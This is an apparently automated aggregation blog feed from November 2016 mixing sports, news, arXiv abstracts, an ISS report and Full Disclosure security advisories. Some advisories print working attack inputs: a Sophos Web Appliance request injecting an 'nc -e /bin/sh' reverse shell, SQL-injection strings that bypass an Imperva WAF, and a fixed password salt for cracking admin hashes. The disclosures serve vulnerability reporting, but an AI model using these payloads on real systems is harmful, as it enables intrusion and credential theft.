UK police arrest nearly 50 at Anonymous protest in London

LONDON (Reuters) – British police said they arrested 47 people on Saturday at an anti-capitalism demonstration in central London organized by the ...

from Google Alert - anonymous http://ift.tt/2fPvrO0
via IFTTT

More Insights On Alleged DDoS Attack Against Liberia Using Mirai Botnet

On Thursday, we compiled a story based on research published by a British security expert reporting that some cyber criminals are apparently using Mirai Botnet to conduct DDoS attacks against the telecommunication companies in Liberia, a small African country. In his blog post, Kevin Beaumont claimed that a Liberian transit provider confirmed him about the DDoS attack of more than 500 Gbps

from The Hacker News http://ift.tt/2fc0TlT
via IFTTT

I have a new follower on Twitter

Tom Greathouse
It Solutions for a better world! #Retail #SmartLabels #RFID #StoreOperations Husband, Dad, #StarWarsGeek, Lightsaber duelist, IT Pro, Passion for Cybersecurity
Buffalo, NY
https://t.co/3iIkukZigX
Following: 703 - Followers: 174

November 05, 2016 at 01:25PM via Twitter http://twitter.com/tgr8house1

Ravens elevate S Matt Elam to 53-man roster; previously designated to return off injured reserve (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

> Actually, it does parse correctly. Go read RFC 1738. IIRC, RFC 3986 "fixes" that, and so does http://ift.tt/ZzeYBu. /mz

Source: Gmail -> IFTTT-> Blogger

Over 1 Billion Android App Accounts can be Hijacked Remotely with this Simple Hack

Security researchers have discovered a way to target a huge number of Android apps that could allow them to remotely sign into any victim's mobile app account without any knowledge of the victim. A group of three researchers – Ronghai Yang, Wing Cheong Lau, and Tianyu Liu – from the Chinese University of Hong Kong has found that most of the popular Android apps that support single sign-on (

from The Hacker News http://ift.tt/2eatYkG
via IFTTT

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

On Thu, Nov 03, 2016 at 05:58:14PM +0800, redrain root wrote: > I can't find any bugtracker in lynx ,so i will disclose by this mail and > sent to the author dickey@invisible-island.net. > > redrain (rootredrain@gmail.com) > Date:2016-11-03 > Version: 2.8.8pre.4、2.8.9dev.8 and earlier > Platform: Linux and Windows > Vendor: http://ift.tt/tQALNj > Vendor Notified: 2016-11-03 > > > VULNERABILITY >

Source: Gmail -> IFTTT-> Blogger

[FD] Bypass Imperva by confusing HTTP Pollution Normalization Engine

################################################# Bypass Imperva by confusing HTTP Pollution Normalization Engine ################################################# Author: Wiswat Aswamenakul Environment: Tested with Imperva Version: 11.5 and Web Backend as IIS + ASP Description: One of technique that attackers use to bypass web application firewall is to use HTTP pollution attack. The attack can be produced by sending parameters with the same name to web application and the result on the web application will depend on which web server and language used on the server. IIS and ASP will combine all the value together separated each one with "," (comma). For example, http://ift.tt/2f3s1py The page sqli.asp will see "a" parameter as "first,second" (without double quote). Therefore, attackers could craft attack string as following: http://ift.tt/2foJxTJ'/*&a=*/or/*&a=*/1=1/*&a=*/--+- The page sqli.asp will sess "a" parameter as "'/*,*/or/*,*/1=1/*,*/--+-" (without double quote). Some web application firewall will fail detecting this attack. However, Imperva handles this type of attack by combining all the parameters with same name like IIS+ASP does (I call it normalization engine) before passing the end result to detection engine. However, I have found that there is a trick, bug, vulnerability, feature, (you name it) that allows the normalization engine to create end results different from IIS+ASP does. [+] Attack that can be detected by Imperva http://ift.tt/2foJxTJ'/*&a=*/or/*&a=*/1=1/*&a=*/--+- [+] Attack that can bypass Imperva http://ift.tt/2foJxTJ'/*&a%00=*/or/*&a=*/1=1/*&a%00=*/--+- *Please notice the %00 in parameter name Imperva treats a and a%00 as different parameters. As a result, when combining the parameter with the same name, it will not see a valid attack string. On the other hand, IIS+ASP see a and a%00 as the same parameters. Apache and PHP also see a and a%00 as the same parameters. Other combinations have not been tested yet. PS. Other web application firewall might be tricked by this technique to bypass their detection but I don't have devices for testing.

Source: Gmail -> IFTTT-> Blogger

[FD] MySQL / MariaDB / PerconaDB - Root Privilege Escalation Exploit ( CVE-2016-6664 / CVE-2016-5617 )

CVE-2016-6664 / (Oracle)CVE-2016-5617 Vulnerability: MySQL / MariaDB / PerconaDB - Root Privilege Escalation Discovered by: Dawid Golunski @dawid_golunski http://ift.tt/2fcYckq MySQL-based databases including MySQL, MariaDB and PerconaDB are affected by a privilege escalation vulnerability which can let attackers who have gained access to mysql system user (for example through CVE-2016-6663) to further escalate their privileges to root user allowing them to fully compromise the system. The vulnerability stems from unsafe file handling of error logs and other files. Affected versions: MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 MariaDB All current Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 The full up-to-date advisory and a PoC exploit can be found at: http://ift.tt/2eZRrlA PoC Video showing the exploitation gaining rootshell: http://ift.tt/2faWtMH attacker will need to obtain mysql account first which could be gained with the other exploit (CVE-2016-6663) I discovered: http://ift.tt/2dZWnda More updates on the feed: https://twitter.com/dawid_golunski

Source: Gmail -> IFTTT-> Blogger

[FD] MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the third entry in that series. The below information is also available on my blog at http://ift.tt/2exA1i7. There you can find a repro that triggered this issue in addition to the information below. Follow me on http://twitter.com/berendjanwever for daily browser bugs. MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read ============================================================== Synopsis

Source: Gmail -> IFTTT-> Blogger

Zayn Malik wants to know what it feels like to be anonymous

During a recent interview with the UK's Evening Standard, the singer revealed that he yearns to know what it feels like to be anonymous. He told the ...

from Google Alert - anonymous http://ift.tt/2fMMLmO
via IFTTT

Ravens claim former Bengals CB Chris Lewis-Harris off of waivers and cut CB Will Davis (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter

Rank K.O. Lab
Growth Hacking and Skunkworks Project for @rankkousa, the leader in Reputation Management. Our mission is to radically innovate the Enterprise ORM Industry.
USA
http://t.co/AijmU3WyFZ
Following: 6601 - Followers: 6910

November 04, 2016 at 06:55PM via Twitter http://twitter.com/rankkolab

Anonymous Pastor in Central Asia Describes Exactly What Christian Persecution Looks Like

A pastor from Central Asia boldly spoke to Faithwire this week, describing some of the dire and heartbreaking scenarios facing Christians […]

from Google Alert - anonymous http://ift.tt/2fkqdGM
via IFTTT

Anonymous scout blasts Revis

While an anonymous scout may have gone over the top when blasting Darrelle Revis for a lack of effort, the Jets should have legitimate concerns ...

from Google Alert - anonymous http://ift.tt/2eHEa0h
via IFTTT

An Anonymous Group Is Sending Out Mailers Touting Libertarian Candidates In 2 Key State House ...

Republicans believe that Democrats are the ones responsible for the anonymous mailers. In a year where third-party candidates are doing better than ...

from Google Alert - anonymous http://ift.tt/2e9pz1n
via IFTTT

Ravens: WR Steve Smith (ankle), LB Terrell Suggs (bicep) questionable for Week 9; both practiced in full Friday (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Privatoria — Protect Your Privacy Online with Fast and Encrypted VPN Service

Today, most of you surf the web unaware of the fact that websites collect your data and track your locations and makes millions by sharing your search histories, location data, and buying habits with advertisers and marketers. And if this isn't enough, there are hackers and cyber criminals out there who have the ability to easily steal your sensitive and personal data from the ill-equipped

from The Hacker News http://ift.tt/2fjR3yK
via IFTTT

[FD] KL-001-2016-009 : Sophos Web Appliance Remote Code Execution

KL-001-2016-009 : Sophos Web Appliance Remote Code Execution Title: Sophos Web Appliance Remote Code Execution Advisory ID: KL-001-2016-009 Publication Date: 2016.11.03 Publication URL: http://ift.tt/2f1FvCa 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Apppliance Affected Version: v4.2.1.3 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-88: Argument Injection or Modification Impact: Remote Code Execution Attack vector: HTTP 2. Vulnerability Description An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user. 3. Technical Description Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as: POST /index.php?c=logs HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 305 Connection: close STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1 HTTP/1.1 200 OK Date: Tue, 10 May 2016 15:35:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 207 {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2016-008 : Sophos Web Appliance Privilege Escalation

KL-001-2016-008 : Sophos Web Appliance Privilege Escalation Title: Sophos Web Appliance Privilege Escalation Advisory ID: KL-001-2016-008 Publication Date: 2016.11.03 Publication URL: http://ift.tt/2f1NIGv 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Apppliance Affected Version: v4.2.1.3 Platform: Embedded Linux CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-261: Weak Cryptography for Passwords Impact: Privilege Escalation Attack vector: HTTP 2. Vulnerability Description An unprivileged user can obtain an MD5 hash of the administrator password which can then be used to discover the plain-text password. 3. Technical Description A user with the privileges: Helpdesk, Policy, Reporting, or User Activity can obtain an MD5 hash for the Full Access Administrator account. A valid session identifier is required and is delivered through the STYLE parameter. GET /index.php?c=change_password&STYLE=7151e50b0389755717510f218b1af00c HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close HTTP/1.1 200 OK Date: Tue, 10 May 2016 00:36:43 GMT Server: Apache X-UA-Compatible: IE=7 Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 8798 ... {"currentUser":"test","globalUser":false,"swa_title":"Change Password","usersJS":"[{\"id\":\"default_admin\",\"username\":\"admin\",\"name\":\"Default Administrator\",\"password\":\"f98d0973dffdc3a29ee67167c15b882e\",\"description\":\"Default Administrator Account\",\"admin\":true,\"roles\":\"Full Access Administrator\",\"reporting_groups\":[]},{\"id\":\"5605c1fef6927d2c45a62b0abcba5385\",\"username\":\"test\",\"name\":\"test\",\"password\":\"caeaea5602b40c779b8669b7001f3396\",\"description\":\"asdfghj\",\"admin\":false,\"roles\":[\"helpdesk\",\"policy\",\"reporting\",\"user_activity\"],\"reporting_groups\":[\"all\"]},{\"id\":\"a39244da844197796609fc5b8aad7f3c\",\"username\":\"woot\",\"name\":\"woot\",\"password\":\"f0ce19faed6df0443c80aceea4c7b7ae\",\"description\":\"none\",\"admin\":false,\"roles\":[\"helpdesk\"],\"reporting_groups\":[]}]","cma":{"joined":false,"host":"","is_cma":false,"swa_joined":false,"is_vm":true},"locale":"en","trialMode":true,"licenseDaysLeft":29,"navigation":["\n Cancel<\/span>\n<\/a>","\n Save<\/span>\n<\/a>"],"navigation_left":[],"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid","uiStatusMessages":{"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid"},"rba":{"reports":true,"search":true,"configuration":true,"system_status":false,"help_support":true,"editable":true,"current_user":"test","globalUser":false,"admin_role":false} ... A fixed salt is apparently used for all such devices: P3T3R p@rk3r The admin MD5 hash in this case is: f98d0973dffdc3a29ee67167c15b882e 4. Mitigation and Remediation Recommendation The vendor has issued a fix for this vulnerability in Version 4.3 of SWA. Release notes available at: http://ift.tt/2foXkIo 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos. 2016.09.14 - Sophos requests KoreLogic re-send vulnerability details. 2016.09.28 - KoreLogic requests status update. 2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October. 2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week. 2016.11.03 - Public disclosure. 7. Proof of Concept >>> from hashlib import md5 >>> md5('P3T3R p@rk3radmin123').hexdigest() 'f98d0973dffdc3a29ee67167c15b882e' The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger

Learn Python Online — From Scratch to Penetration Testing

When we started our brand new THN Deals Store last week on the special occasion of company's 6th Anniversary, we introduced its very first product, Professional Hacking Certification Package, and received great response from our readers. Thank you! If you have not yet, you can still get this deal — Computer Hacker Professional Certification Package — at 96% discount. This Package offers you

from The Hacker News http://ift.tt/2fjskuz
via IFTTT

ISS Daily Summary Report – 11/03/2016

Orbital ATK (OA)-5 Cargo Operations:  Today, CDR continued transferring cargo from Cygnus to ISS. Afterwards, CDR participated in a cargo conference with ground specialists. At last report approximately 9.5 hours of cargo operations had been completed and an estimated 16 hours of operations remaining.  Human Research Program (HRP) Collections: CDR began 24-hour urine collections this morning in support of the Biochemical Profile and Repository experiments. Collected samples are placed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return at a later date. This afternoon, CDR setup for tomorrow’s blood collections. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. Repository is a storage bank used to maintain biological specimens over extended periods of time and under well-controlled conditions. This repository supports scientific discovery that contributes to our fundamental knowledge in the area of human physiological changes and adaptation to a microgravity environment and provides unique opportunities to study longitudinal changes in human physiology spanning many missions.  Compound Specific Analyzer-Combustion (CSA-CP) Checkout:  The CDR changed out the batteries in two newly resupplied CSA-CP units and update internal clock settings. The CSA-CP units will sit deactivated with new batteries for at least 24-hours for sensors to re-establish bias voltages, and for 10-12 days in an open environment for sensor off-gassing. Premature Combustion Integration Rack (CIR) Ignitor Burnout: Following seven successful FLame Extinguishment-2 (FLEX-2) test points, ground teams observed the CIR Ignitor #2 had burned out during the radiometer calibration. Yesterday’s test points was the third day using the ignitors, with two additional days scheduled prior to the planned ignitor replacement. Ground teams will activate the rack today and bring down the images from yesterday’s test. A forward plan for ignitor replacement and future CIR operations is in development.  Today’s Planned Activities All activities were completed unless otherwise noted. Regeneration of Micropurification Unit (БМП) Ф2 Cartridge (start) ALGOMETRIYA. Pressure and Thermal Algometry preparation for and measurement session Veggie fan speed change HRF Generic Urine Collection Setup First Time SM Ventilation Subsystem Preventive Maintenance. Group А MORNING PREPARATION WORK Food Frequency Questionnaire (FFQ) or ISS Food Intake Tracker (ISS FIT) Combustion Integrated Rack Alignment Guide Installation P/TV CEVIS Video Setup Preparation for ИП-1 Flow Indicator R&R. Measuring CO partial pressure at Central Post using CSA-CP analyzer (Located on SM Central Post panel 208). Battery replacement (as necessary) Report to MCC measurement data and analyzer number Soyuz 732 Samsung Tablet Recharge, Initiate 24-hour ECG Recording (termination) CEVIS Exercise Video Stow 24-hour BP recording (terminate) Crew time for ISS adaptation and orientation Preparation for Nitrogen Purge Unit (БПА-M) R&R in Elektron-VM Oxygen Generation Unit [СКО]. СОЖ maintenance Transfer Cygnus Cargo Operations Soyuz 732 Samsung Tablet Recharge, Terminate Cygnus Cargo Operations Conference ALGOMETRIYA. Pressure Algometry Measurement Ops 24-hour ECG Recording (start) Soyuz 732 Transfers and IMS Ops HRF Generic Frozen Blood Collection Setup Download of BRI log from RSS1 Crew time for ISS adaptation and orientation Regenerative Environmental Control and Life Support System (RGN) WSTA Fill PAO Preparation Public Affairs Office (PAO) High Definition (HD) Config LAB Setup Public Affairs Office (PAO) Event in High Definition (HD) – Lab Compound Specific Analyzer-Combustion (CSA-CP) Checkout INTERACTION-2. Experiment. Inventory Management System (IMS) Conference CB/ISS CREW CONFERENCE ISS Crew Orientation Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Flight Director/ISS CREW CONFERENCE Regeneration of БМП Ф2 Absorption Cartridge (end) ALGOMETRIYA. Pressure and Thermal Algometry Measurement Session. Closeout Ops  Completed Task List Items On-board Training (OBT) Cygnus Attached Phase Operations review Tropical Cyclone Operations Review Connects and powers on the WORF Laptop. Ground Activities All activities were completed unless otherwise noted. Channel 4B Battery Capacity Test P4 IEA Survey Three-Day Look Ahead: Friday, 11/05: HRF centrifuge setup & blood collection/stow, Recycle tank drain to EDV, Cygnus cargo transfer Saturday, 11/06: Weekly Housekeeping Sunday, 11/07: Crew Off Duty QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Shutdown Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2euU6W5
via IFTTT

[FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

I can't find any bugtracker in lynx ,so i will disclose by this mail and sent to the author dickey@invisible-island.net. redrain (rootredrain@gmail.com) Date:2016-11-03 Version: 2.8.8pre.4、2.8.9dev.8 and earlier Platform: Linux and Windows Vendor: http://ift.tt/tQALNj Vendor Notified: 2016-11-03 VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

On Thu, Nov 03, 2016 at 05:58:14PM +0800, redrain root wrote: > I can't find any bugtracker in lynx ,so i will disclose by this mail and > sent to the author dickey@invisible-island.net. > > redrain (rootredrain@gmail.com) > Date:2016-11-03 > Version: 2.8.8pre.4、2.8.9dev.8 and earlier FYI, as far as I can tell, this bug is present in 2.8.9dev.9 as well.

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [oss-security] CVE request:Lynx invalid URL parsing with '?'

On Thu, Nov 03, 2016 at 05:58:14PM +0800, redrain root wrote: > I can't find any bugtracker in lynx ,so i will disclose by this mail and > sent to the author dickey@invisible-island.net. thanks (I'll put together a fix)

Source: Gmail -> IFTTT-> Blogger

[FD] MSIE 10 MSHTML CElement::GetPlainTextInScope out-of-bounds read

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the third entry in that series. The below information is also available on my blog at http://ift.tt/2fByXfl. There you can find a repro that triggered this issue in addition to the information below. Follow me on http://twitter.com/berendjanwever for daily browser bugs. MSIE 10 MSHTML CElement::GetPlainTextInScope out-of-bounds read =============================================================== (The fix and CVE number for this bug are not known) Synopsis

Source: Gmail -> IFTTT-> Blogger

Wi-Fi can be turned into IMSI Catcher to Track Cell Phone Users Everywhere

Here's a new danger to your smartphone security: Your mobile device can be hijacked and tracked without your knowledge. Remember Stingrays? The controversial cell phone spying tool, also known as "IMSI catchers," has long been used by law enforcement to track and monitor mobile users by mimicking a cellphone tower and tricking their devices to connect to them. Sometimes it even intercepts

from The Hacker News http://ift.tt/2e7MTwC
via IFTTT

Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. (arXiv:1611.00791v1 [cs.CR])

Various families of malware use domain generation algorithms (DGAs) to generate a large number of pseudo-random domain names to connect to a command and control (C&C) server. In order to block DGA C&C traffic, security organizations must first discover the algorithm by reverse engineering malware samples, then generating a list of domains for a given seed. The domains are then either preregistered or published in a DNS blacklist. This process is not only tedious, but can be readily circumvented by malware authors using a large number of seeds in algorithms with multivariate recurrence properties (e.g., banjori) or by using a dynamic list of seeds (e.g., bedep). Another technique to stop malware from using DGAs is to intercept DNS queries on a network and predict whether domains are DGA generated. Such a technique will alert network administrators to the presence of malware on their networks. In addition, if the predictor can also accurately predict the family of DGAs, then network administrators can also be alerted to the type of malware that is on their networks. This paper presents a DGA classifier that leverages long short-term memory (LSTM) networks to predict DGAs and their respective families without the need for a priori feature extraction. Results are significantly better than state-of-the-art techniques, providing 0.9993 area under the receiver operating characteristic curve for binary classification and a micro-averaged F1 score of 0.9906. In other terms, the LSTM technique can provide a 90% detection rate with a 1:10000 false positive (FP) rate---a twenty times FP improvement over comparable methods. Experiments in this paper are run on open datasets and code snippets are provided to reproduce the results.

from cs.AI updates on arXiv.org http://ift.tt/2f6AoOJ
via IFTTT

Quantile Reinforcement Learning. (arXiv:1611.00862v1 [cs.LG])

In reinforcement learning, the standard criterion to evaluate policies in a state is the expectation of (discounted) sum of rewards. However, this criterion may not always be suitable, we consider an alternative criterion based on the notion of quantiles. In the case of episodic reinforcement learning problems, we propose an algorithm based on stochastic approximation with two timescales. We evaluate our proposition on a simple model of the TV show, Who wants to be a millionaire.

from cs.AI updates on arXiv.org http://ift.tt/2fhzt0F
via IFTTT

Extracting Actionability from Machine Learning Models by Sub-optimal Deterministic Planning. (arXiv:1611.00873v1 [cs.AI])

A main focus of machine learning research has been improving the generalization accuracy and efficiency of prediction models. Many models such as SVM, random forest, and deep neural nets have been proposed and achieved great success. However, what emerges as missing in many applications is actionability, i.e., the ability to turn prediction results into actions. For example, in applications such as customer relationship management, clinical prediction, and advertisement, the users need not only accurate prediction, but also actionable instructions which can transfer an input to a desirable goal (e.g., higher profit repays, lower morbidity rates, higher ads hit rates). Existing effort in deriving such actionable knowledge is few and limited to simple action models which restricted to only change one attribute for each action. The dilemma is that in many real applications those action models are often more complex and harder to extract an optimal solution.

In this paper, we propose a novel approach that achieves actionability by combining learning with planning, two core areas of AI. In particular, we propose a framework to extract actionable knowledge from random forest, one of the most widely used and best off-the-shelf classifiers. We formulate the actionability problem to a sub-optimal action planning (SOAP) problem, which is to find a plan to alter certain features of a given input so that the random forest would yield a desirable output, while minimizing the total costs of actions. Technically, the SOAP problem is formulated in the SAS+ planning formalism, and solved using a Max-SAT based approach. Our experimental results demonstrate the effectiveness and efficiency of the proposed approach on a personal credit dataset and other benchmarks. Our work represents a new application of automated planning on an emerging and challenging machine learning paradigm.

from cs.AI updates on arXiv.org http://ift.tt/2f6AA0u
via IFTTT

Maximizing Investment Value of Small-Scale PV in a Smart Grid Environment. (arXiv:1611.00890v1 [math.OC])

Determining the optimal size and orientation of small-scale residential based PV arrays will become increasingly complex in the future smart grid environment with the introduction of smart meters and dynamic tariffs. However consumers can leverage the availability of smart meter data to conduct a more detailed exploration of PV investment options for their particular circumstances. In this paper, an optimization method for PV orientation and sizing is proposed whereby maximizing the PV investment value is set as the defining objective. Solar insolation and PV array models are described to form the basis of the PV array optimization strategy. A constrained particle swarm optimization algorithm is selected due to its strong performance in non-linear applications. The optimization algorithm is applied to real-world metered data to quantify the possible investment value of a PV installation under different energy retailers and tariff structures. The arrangement with the highest value is determined to enable prospective small-scale PV investors to select the most cost-effective system.

from cs.AI updates on arXiv.org http://ift.tt/2fhEYfZ
via IFTTT

Probabilistic Modeling of Progressive Filtering. (arXiv:1611.01080v1 [cs.AI])

Progressive filtering is a simple way to perform hierarchical classification, inspired by the behavior that most humans put into practice while attempting to categorize an item according to an underlying taxonomy. Each node of the taxonomy being associated with a different category, one may visualize the categorization process by looking at the item going downwards through all the nodes that accept it as belonging to the corresponding category. This paper is aimed at modeling the progressive filtering technique from a probabilistic perspective, in a hierarchical text categorization setting. As a result, the designer of a system based on progressive filtering should be facilitated in the task of devising, training, and testing it.

from cs.AI updates on arXiv.org http://ift.tt/2f6Aeag
via IFTTT

Long-term causal effects via behavioral game theory. (arXiv:1501.02315v7 [stat.ME] UPDATED)

Planned experiments are the gold standard in reliably comparing the causal effect of switching from a baseline policy to a new policy. One critical shortcoming of classical experimental methods, however, is that they typically do not take into account the dynamic nature of response to policy changes. For instance, in an experiment where we seek to understand the effects of a new ad pricing policy on auction revenue, agents may adapt their bidding in response to the experimental pricing changes. Thus, causal effects of the new pricing policy after such adaptation period, the {\em long-term causal effects}, are not captured by the classical methodology even though they clearly are more indicative of the value of the new policy. Here, we formalize a framework to define and estimate long-term causal effects of policy changes in multiagent economies. Central to our approach is behavioral game theory, which we leverage to formulate the ignorability assumptions that are necessary for causal inference. Under such assumptions we estimate long-term causal effects through a latent space approach, where a behavioral model of how agents act conditional on their latent behaviors is combined with a temporal model of how behaviors evolve over time.

from cs.AI updates on arXiv.org http://ift.tt/1AK82il
via IFTTT

Surprising properties of dropout in deep networks. (arXiv:1602.04484v4 [cs.LG] UPDATED)

We analyze dropout in deep networks with rectified linear units and the quadratic loss. Our results expose surprising differences between the behavior of dropout and more traditional regularizers like weight decay. For example, on some simple data sets dropout training produces negative weights even though the output is the sum of the inputs. This provides a counterpoint to the suggestion that dropout discourages co-adaptation of weights. We also show that the dropout penalty can grow exponentially in the depth of the network while the weight-decay penalty remains essentially linear, and that dropout is insensitive to various re-scalings of the input features, outputs, and network weights. This last insensitivity implies that there are no isolated local minima of the dropout training criterion. Our work uncovers new properties of dropout, extends our understanding of why dropout succeeds, and lays the foundation for further progress.

from cs.AI updates on arXiv.org http://ift.tt/1KSFax2
via IFTTT

Analyzing Games with Ambiguous Player Types using the ${\rm MINthenMAX}$ Decision Model. (arXiv:1603.01524v3 [cs.GT] UPDATED)

In many common interactive scenarios, participants lack information about other participants, and specifically about the preferences of other participants. In this work, we model an extreme case of incomplete information, which we term games with type ambiguity, where a participant lacks even information enabling him to form a belief on the preferences of others. Under type ambiguity, one cannot analyze the scenario using the commonly used Bayesian framework, and therefore he needs to model the participants using a different decision model.

In this work, we present the ${\rm MINthenMAX}$ decision model under ambiguity. This model is a refinement of Wald's MiniMax principle, which we show to be too coarse for games with type ambiguity. We characterize ${\rm MINthenMAX}$ as the finest refinement of the MiniMax principle that satisfies three properties we claim are necessary for games with type ambiguity. This prior-less approach we present her also follows the common practice in computer science of worst-case analysis.

Finally, we define and analyze the corresponding equilibrium concept assuming all players follow ${\rm MINthenMAX}$. We demonstrate this equilibrium by applying it to two common economic scenarios: coordination games and bilateral trade. We show that in both scenarios, an equilibrium in pure strategies always exists and we analyze the equilibria.

from cs.AI updates on arXiv.org http://ift.tt/1LKDCWt
via IFTTT

DeepDGA: Adversarially-Tuned Domain Generation and Detection. (arXiv:1610.01969v1 [cs.CR] CROSS LISTED)

Many malware families utilize domain generation algorithms (DGAs) to establish command and control (C&C) connections. While there are many methods to pseudorandomly generate domains, we focus in this paper on detecting (and generating) domains on a per-domain basis which provides a simple and flexible means to detect known DGA families. Recent machine learning approaches to DGA detection have been successful on fairly simplistic DGAs, many of which produce names of fixed length. However, models trained on limited datasets are somewhat blind to new DGA variants.

In this paper, we leverage the concept of generative adversarial networks to construct a deep learning based DGA that is designed to intentionally bypass a deep learning based detector. In a series of adversarial rounds, the generator learns to generate domain names that are increasingly more difficult to detect. In turn, a detector model updates its parameters to compensate for the adversarially generated domains. We test the hypothesis of whether adversarially generated domains may be used to augment training sets in order to harden other machine learning models against yet-to-be-observed DGAs. We detail solutions to several challenges in training this character-based generative adversarial network (GAN). In particular, our deep learning architecture begins as a domain name auto-encoder (encoder + decoder) trained on domains in the Alexa one million. Then the encoder and decoder are reassembled competitively in a generative adversarial network (detector + generator), with novel neural architectures and training strategies to improve convergence.

from cs.AI updates on arXiv.org http://ift.tt/2f6yjm5
via IFTTT

Google Linking Anonymous Browser Tracking with Identifiable Tracking

Google Linking Anonymous Browser Tracking with Identifiable Tracking. Google's new ways to violate your privacy and -- more importantly -- how to ...

from Google Alert - anonymous http://ift.tt/2f6t45H
via IFTTT

Someone is Using Mirai Botnet to Shut Down Internet for an Entire Country

Someone is trying to take down the whole Internet of a country by launching massive distributed denial-of-service (DDoS) attacks using a botnet of insecure IoT devices infected by the Mirai malware. It all started early October when a cybercriminal publically released the source code of Mirai – a piece of nasty IoT malware designed to scan for insecure IoT devices and enslaves them into a botnet

from The Hacker News http://ift.tt/2f5Fgnd
via IFTTT

Ravens: Terrell Suggs tells his younger teammates about rivalry with the Steelers - "These games will define you" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: WR Steve Smith Sr. (ankle) in doubt for Sunday vs. Steelers after not practicing Thursday; out since Oct. 9 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

